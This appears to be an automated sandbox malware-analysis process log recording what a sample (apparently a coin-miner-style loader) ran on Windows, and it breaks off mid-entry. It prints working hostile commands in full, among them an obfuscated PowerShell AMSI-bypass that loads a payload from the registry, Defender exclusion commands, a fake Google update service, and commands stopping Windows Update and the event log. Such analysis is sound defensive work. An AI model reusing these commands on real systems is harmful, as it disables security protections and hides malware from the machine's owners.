                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\wusa.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff7c7170000
                                                        File size:345'088 bytes
                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                        Imagebase:0x7ff66e660000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMwf=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PKjZFAJMrKtEHtCAQET=OkULRfyuHQtJ @([String])([IntPtr]);$TwfHJfbEiJESflVXJDRdie=OkULRfyuHQtJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VJhcAYUztep=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'od'+[Char](117)+''+[Char](108)+''+'e'+'H'+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.'+[Char](100)+'l'+[Char](108)+'')));$pGTzdTbPDPtdSw=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$gmmiBVEmviKAGYOfq=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$RgMdvyV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pGTzdTbPDPtdSw,$PKjZFAJMrKtEHtCAQET).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$RRZbMqrVsxPNJwFWd=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$RgMdvyV,[Object]('Am'+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$InrlgaQyOp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,4,[ref]$InrlgaQyOp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RRZbMqrVsxPNJwFWd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,0x20,[ref]$InrlgaQyOp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+'er'+'s'+'ta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:33
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:34
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:35
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                        Imagebase:0x7ff6931b0000
                                                        File size:5'536'856 bytes
                                                        MD5 hash:1417D38C40D85D1C4EB7FAD3444CA069
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 74%, ReversingLabs
                                                        • Detection: 75%, Virustotal
                                                        Has exited:true

                                                        Target ID:38
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:39
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff70b4f0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:43
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:44
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\wusa.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff7c7170000
                                                        File size:345'088 bytes
                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}
                                                        Imagebase:0x7ff642ec0000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:47
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:50
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\winlogon.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:winlogon.exe
                                                        Imagebase:0x7ff70f350000
                                                        File size:906'240 bytes
                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:51
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
